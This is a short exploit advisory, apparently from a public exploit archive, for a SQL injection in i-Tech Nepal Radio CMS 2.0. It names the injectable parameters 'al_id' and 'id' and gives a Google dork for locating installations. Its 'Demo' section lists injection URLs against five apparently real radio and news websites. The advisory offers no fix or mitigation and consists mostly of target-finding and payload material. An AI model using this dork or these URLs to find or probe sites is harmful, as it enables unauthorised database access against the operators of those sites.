i-Tech Nepal Radio CMS 2.0 SQL Injection
Posted on 26 April 2016
###################### # Exploit Title : i-Tech Nepal Radio CMS SQL Injection Vulnerability # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.itechnepal.com # Google Dork : "Powered By : i-Tech Nepal" inurl:php? # Date: 2016/04/26 # Category: [ Webapps ] # Tested on: [Win /php ] # Version : 2.0 ###################### # Vulnerable Input(s): # [+] al_id # [+] id # # Demo: # http://www.holyvisionradio.com/photo.php?al_id=6%27 # http://www.choicefm.org/image.php?al_id=7%27 # http://www.bhorukawafm.org/image.php?al_id=15%27 # http://www.radiodidibahini.org/image.php?al_id=1%27 # http://janakpurtoday.com.np/photo.php?id=10 # ###################### # Discovered by : # Mojtaba MobhaM (kazemimojtaba@live.com) # T3NZOG4N (t3nz0g4n@yahoo.com) # Greetz : All Persian Hack Team Members # Homepage : persian-team.ir ######################